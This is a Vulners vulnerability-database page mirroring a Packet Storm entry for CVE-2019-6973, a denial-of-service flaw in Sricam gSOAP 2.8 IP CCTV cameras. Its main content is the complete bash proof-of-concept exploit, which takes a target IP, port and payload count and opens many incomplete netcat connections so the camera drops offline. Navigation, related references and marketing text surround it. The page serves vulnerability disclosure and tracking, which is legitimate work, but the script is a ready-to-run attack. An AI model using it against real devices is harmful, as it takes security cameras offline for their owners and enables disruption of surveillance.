Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sricam gSOAP 2.8 Denial Of Service

🗓️ 29 Jan 2019 00:00:00Reported by Andrew WatsonType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 244 Views

Sricam gSOAP 2.8 Denial Of Service exploit by bitfu, vendor informed, CVE-2019-6973, multiple incomplete requests, Sricam IP CCTV Camera vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Sricam gSOAP 2.8 - Denial of Service Exploit
28 Jan 201900:00
zdt
CVE		CVE-2019-6973
17 Mar 201918:12
cve
Cvelist		CVE-2019-6973
17 Mar 201918:12
cvelist
Exploit DB		Sricam gSOAP 2.8 - Denial of Service
28 Jan 201900:00
exploitdb
exploitpack		Sricam gSOAP 2.8 - Denial of Service
28 Jan 201900:00
exploitpack
NVD		CVE-2019-6973
21 Mar 201916:01
nvd
Prion		Denial of service
21 Mar 201916:01
prion
`#!/bin/bash  
  
#######################################################################################  
#  
# Exploit Title: Sricam gSOAP 2.8 - Denial of Service  
# Date: 25/01/2019   
# Vendor Status: Informed (24/10/2018)  
# CVE ID: CVE-2019-6973  
# Exploit Author: Andrew Watson  
# Contact: https://keybase.io/bitfu  
# Software Version: Sricam gSOAP 2.8  
# Vendor Homepage: http://www.sricam.com/  
# Tested on: Sricam IP CCTV Camera running gSOAP 2.8 on TCP/5000  
# PoC Details: Sricam IP CCTV Camera's are vulnerable to denial of service,  
# exploitable by sending multiple incomplete requests.  
# References: https://github.com/bitfu/sricam-gsoap2.8-dos-exploit  
#  
# DISCLAIMER: This proof of concept is provided for educational purposes only!  
#  
#######################################################################################  
  
  
if [ -z "$3" ]; then  
echo "#############################################################################"  
echo -e "[*] Sricam gSOAP 2.8 Denial of Service exploit by bitfu"  
echo -e "\n[*] Usage: $0 <IP_Address> <Port> <#_DoS_Payloads>"  
echo "[*] Example: $0 127.0.0.1 5000 10"  
echo -e "\n[!] Each DoS payload sent adds another 20 seconds downtime.\n"  
exit 0  
fi  
  
time=$(expr $3 \* 20)  
echo "[*] Sricam gSOAP 2.8 Denial of Service exploit by bitfu"  
echo -e "\n[+] Sending $3 DoS payloads..."  
echo "[+] Expected downtime: $time seconds"  
for dos in $(seq 1 $3); do  
netcat $1 $2 &  
done  
echo -e "\n[!] $dos DoS payloads sent to: $1:$2"  
echo  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Jan 2019 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.12542
sricamgsoap 2.8denial of servicebitfuvendorcve-2019-6973multiple incomplete requestsip cctv camera
244